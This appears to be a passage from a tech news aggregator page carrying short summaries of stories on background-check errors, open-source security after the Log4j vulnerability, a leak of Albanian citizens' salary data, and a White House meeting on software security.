From the article: Some of the errors detailed in lawsuits against background check firms are inexplicable and show a lack of basic attention to detail. Common mistakes include mismatched names and addresses. One background check lawsuit alleged that the first name of Ashley was misidentified as Alysha. In another case, two people with the same first and last name were mixed up despite their distinct middle names: Magdalena and Elena... In another lawsuit, an applicant with a middle name of Scot (one T) was confused with someone whose middle name was Scott (two T's). A background check firm told one job applicant that his Social Security number was in the government's "Death Master File...."
"The candidate may protest. But by then, HR has likely dropped the candidate in an effort to fill an open position," the article points out, offering one example where a corrected background check then arrived, but several weeks later. (The man's lawyer believes it's common for employers to then still refuse to consider an application, simply because "first impressions are everything.")

The article adds that the U.S. Consumer Financial Protection Bureau is now "threatening enforcement actions in concert with the U.S. Federal Trade Commission and Department of Justice." They've already issued an advisory in November calling out "shoddy name matching procedures" used to link people with criminal and other records, and warned that "Even ostensibly low error rates can harm significant numbers of consumers" — especially since more than 90% of U.S. employers use background check data in their hiring processes.
Open Source

Will It Take More Than Open Source Funding To Prevent the Next Log4j? (openssf.org) 110

"While the lack of funding in open source is certainly a problem, could funding have prevented the Log4j vulnerabilities?" asks Mike Melanson's "This Week in Programming" column. "Would funding actually prevent similar vulnerabilities in the future...?"

Or is that an oversimplification? In a blog post for the Linux Foundation's Open Source Security Foundation (OpenSSF), Brian Behlendorf argued that open source foundations must work together to prevent the next Log4Shell scramble, outlining seven things OSS foundations could do to mitigate security risks. Among those seven points — which include security scanning, outside audits, dependency tracking, test frameworks, organization-wide security teams, and requiring projects to remove old, vulnerable code — not once was funding mentioned. Rather, Behlendorf precedes these points by saying that "Too many organizations have failed to apply raised funds or set process standards to improve their security practices, and have unwisely tilted in favor of quantity over quality of code."

Behlendorf continues after his list of seven suggested acts with a section that boils everything down perfectly:

"None of the above practices is about paying developers more, or channeling funds directly from users of software to developers. Don't get me wrong, open source developers and the people who support them should be paid more and appreciated more in general. However, it would be an insult to most maintainers to suggest that if you'd just slipped more money into their pockets they would have written more secure code. At the same time, it's fair to say a tragedy-of-the-commons hits when every downstream user assumes that these practices are in place, being done and paid for by someone else."

Behlendorf does go on to make some points about funds and fundraising, but his point is less on the lack of funding than the allocation of those funds and how they need to be focused on things like paid audits and "providing resources to move critical projects or segments of code to memory-safe languages, or fund bounties for more tests."

Behlendorf says that, in the new year, the OpenSSF will be working to "raise the floor" for security in open source.

"The only way we do this effectively is to develop tools, guidance, and standards that make adoption by the open source community encouraged and practical rather than burdensome or bureaucratic," he wrote. "We will be working with and making grants to other open source projects and foundations to help them improve their security game."

Behlendorf was a founding member of the Apache Group, which later became the Apache Software Foundation.

So as a long-time member of the Open Source community, he calls the Log4j vulnerabilities "a humbling reminder of just how far we still have to go."
Privacy

Personal and Salary Data for 637,138 Albanian Citizens Leaks Online (therecord.media) 15

The Albanian government has confirmed and apologized this week for a data leak that exposed the personal and salary-related information for 637,138 citizens, more than 22% of the country's entire population. From a report: Details such as names, ID card numbers, salaries, job positions, and employer names were shared over the weekend on WhatsApp as an Excel document. The file included what appeared to be tax and salary information filed by companies with the Albanian government for the month of January 2021, according to local media. In a press conference today, Prime Minister Edi Rama confirmed and apologized for the breach. "According to a preliminary analysis, it looks more like an internal infiltration rather than an outside [...] cyber-attack," Rama told reporters, according to the Associated Press. The leak is now being investigated by the Tirana Prosecutor's Office, a government spokesperson said.
Open Source

White House Enlists Software Industry To Improve Open-Source Security (bloomberg.com) 63

White House officials are asking major software companies and developers to work with them to improve the security of open-source software, according to an administration official. From a report: The invitation follows the disclosure of a vulnerability in popular open-source Apache software that cybersecurity officials have described as one of the most serious in recent memory. In a letter Thursday, National Security Advisor Jake Sullivan invited major players in the software industry to discuss initiatives to improve open-source software security, the official said. Dozens of open-source software projects have become crucial components of global commerce and are mostly maintained by volunteers. The effort will start with a one-day discussion in January hosted by Anne Neuberger, the deputy national security advisor for cyber and emerging technology, according to the official. In the letter, Sullivan wrote that open-source software has accelerated the pace of innovation but pointed out that the fact that it is broadly used and maintained by volunteers is a "combination that is a key national security concern, as we are experiencing with the Log4j vulnerability," the official said.
Security

New Log4J Flaw Caps Year of Relentless Cybersecurity Crises (wsj.com) 77

'Exhausted' network defenders say technological dependency creates new vulnerabilities. From a report: Cyberattacks on major technology providers and the interconnected world of software and hardware that power the global economy continued at a relentless pace in 2021, according to U.S. officials and security experts. Instead of one company being victimized at a time like in a traditional data breach, thousands were often exposed simultaneously. Businesses, hospitals and schools also worked to defend themselves against an onslaught of ransomware attacks, which increasingly reap $10 million or more in extortion payments. The annus horribilis culminated this month with discovery of a flaw in an obscure but widely used internet code known as Log4j, which one senior Biden administration official said was the worst she had seen in her career. The latest vulnerability comes as U.S. officials warn corporate leaders of a potential surge of cyberattacks while businesses slow their operations during the holiday season.

The string of incidents highlights how decades of digital transformation have linked business and government computer systems in opaque and sometimes surprising ways that will create new vulnerabilities. Major disruptions are certain to continue, cybersecurity officials said. "Network defenders are exhausted," said Joe Slowik, threat-intelligence lead at the security firm Gigamon. New attention and investment in cybersecurity hasn't improved the status quo, he said. "Money is flowing into the field, but largely on technical solutions while the core need -- more capable people -- remains hard to address."
